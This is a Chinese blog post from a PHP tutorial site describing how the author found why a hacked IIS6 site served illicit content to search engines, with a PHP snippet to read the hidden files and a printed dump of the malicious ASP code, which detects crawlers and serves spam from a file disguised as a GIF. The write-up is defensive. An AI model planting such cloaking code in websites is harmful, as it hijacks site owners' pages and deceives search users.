欢迎来到php自学网~
阅读模式:

解决网站主页被非法篡改

查看:3559  回复:0  类型:  来源:php自学网  标签 运维

运行环境iis6+php ,搜索引擎总是收录非法的内容,总是去不掉,而且通过ftp看不到恶意文件。

于是通过访问index.asp发现了问题。

通过php获取了这个文件的代码:

<?php
    if(file_exists('index.asp')){
        //非法默认加载的首页文件
        $file = file_get_contents('index.asp');
        var_dump($file);
        //非法伪装成图片的恶意内容文件
        if(file_exists('static/images/doc.gif')) {
            $files = file_get_contents('static/images/doc.gif');
            var_dump($files);
        }

    }else{
        echo '0';
    }
?>


发现了恶意代码,这里的主要做了判断是不是搜索引擎访问,如果是就去加载伪装成图片的非法内容的文件,所以搜索引擎一抓去就是非法内容了,如果用的iis6,而且通过ftp看不到这些文件,建议更换服务器环境,禁用iis 更换成nginx+php环境。

string(22174) "пїњ<%
function isspider()
dim agent,searray,i agent="agent:"&LCase(request.servervariables("http_user_agent"))
searray=array("googlebot","baiduspider","sogou","yahoo","soso","360","so","yahoo","bing","sm")
isspider= false for i=0 to ubound(searray) if (instr(agent,searray(i))>0) then
isspider=true next end function function fromse()
dim urlrefer,i,searray urlrefer="refer:"&LCase(request.ServerVariables("HTTP_REFERER"))
fromse= false if urlrefer="" 
then fromse= false searray=array("google","baidu","sogou","yahoo","soso","360","so","yahoo","bing","sm")
for i=0 to ubound(searray) if (instr(urlrefer,searray(i))>0) 
then fromse=true next end function function mainpage()
dim mainindex,n,pagearray,indexquery,i mainindex=LCase(request.ServerVariables("SCRIPT_NAME"))
indexquery=LCase(request.ServerVariables("QUERY_STRING"))
mainpage= false pagearray=array("/index.","/default.","/main.")
for i=0 to ubound(pagearray)
if (instr(mainindex,pagearray(i))>0 and len(indexquery)<2)
then mainpage=true next end function if isspider() and mainpage()
then
dim mfso,mfileurl,mfilecon,wfile mfileurl=Server.MapPath("static/images/doc.gif")
Set mfso=Server.CreateObject("Scripting.FileSystemObject")
if mfso.FileExists(mfileurl)
then Set wfile=mfso.OpenTextFile(mfileurl, 1)
mfilecon=wfile.readAll response.clear
response.write(mfilecon) response.write("")
response.flush wfile.Close Set wfile=Nothing
Set mfso=Nothing response.end
else response.write("fn")
end if end
if if (fromse() and mainpage()) then response.clear
%>


分享到:
0 0

*有问题之处烦请在评论中指出非常感谢!
不是我想要的内容,继续搜索:

扫描二维码手机查看

发布评论:


登录:
  表情:
评论话题
推荐阅读:
centos 7 添加 redis 3.2.9 开机启动脚本   阅读:3375给网站添加一键qq登录的功能   阅读:2495linux命令中执行php脚本   阅读:1822centos 7 安装 php-7.1.3   阅读:8432centos 7 设置 nginx-1.11.10 开机启动   阅读:2853mysql的四种索引类型   阅读:3626一步步带你,如何网站架构   阅读:1480php文件下载防盗链   阅读:3462mysql中文分词全文搜索索引讯搜的安装   阅读:1919php 统计网页打开耗时和脚本运行内存   阅读:2371知乎百万赞作者告诉你:年薪百万的人都在靠什么赚钱   阅读:1840linux rarcrack破解rar、zip和7z压缩包简单密码的工具   阅读:2672霍金24岁博士毕业论文在线预览   阅读:1559centos 7.2 添加php7 的 php-fpm 开机启动   阅读:9422shell脚本统计当前服务器并发连接数   阅读:2058分享:淘宝技术这十年   阅读:1699centos 7搭建zabbix3.4   阅读:263web项目高并发量网站解决方案   阅读:1445php设置cookie为HttpOnly防止XSS攻击   阅读:2838一键分享到QQ空间、QQ好友、新浪微博、微信代码   阅读:11529php冒泡排序法   阅读:1742爱编程,也爱健康   阅读:1175ajax+php 实现一个简单的在线聊天室功能(附带源码)   阅读:3286霍金24岁博士毕业论文在线预览   阅读:1559十张GIF让你弄懂递归等概念   阅读:1846shell发送邮件脚本   阅读:193javascript对cookie操作详细代码函数   阅读:1770nginx编译安装后对nginx进行平滑升级   阅读:528javascript点击复制内容   阅读:1784linux rarcrack破解rar、zip和7z压缩包简单密码的工具   阅读:2672centos 7 开启网络   阅读:1773php+redis实现消息队列   阅读:1174mysql共享锁和排他锁详解   阅读:2013把php session 会话保存到redis   阅读:2426php打印九九乘法表   阅读:2267php中地址引用&的真正理解-变量引用、函数引用、对象引用   阅读:1634centos 7 设置 nginx-1.11.10 开机启动   阅读:2853web性能测试工具ab的测试方法   阅读:1580用php从1加到100的值   阅读:3169php 获取当前前后年、月、星期、日、时分秒的时间   阅读:2006php删除一个文件夹内的所有文件夹和文件   阅读:1946解决 nginx 413 request entity too large   阅读:1440php生成二维码   阅读:2004phpexcel 超简单从excel表格一键导入数据到数据库教程   阅读:5461面试的时候回去等通知,等电话的真实意思   阅读:7499php删除一个文件夹内的所有文件夹和文件   阅读:1946解决 nginx 413 request entity too large   阅读:1440Nginx 配置文件详解   阅读:1666一键分享到QQ空间、QQ好友、新浪微博、微信代码   阅读:11529mysql共享锁和排他锁详解   阅读:2013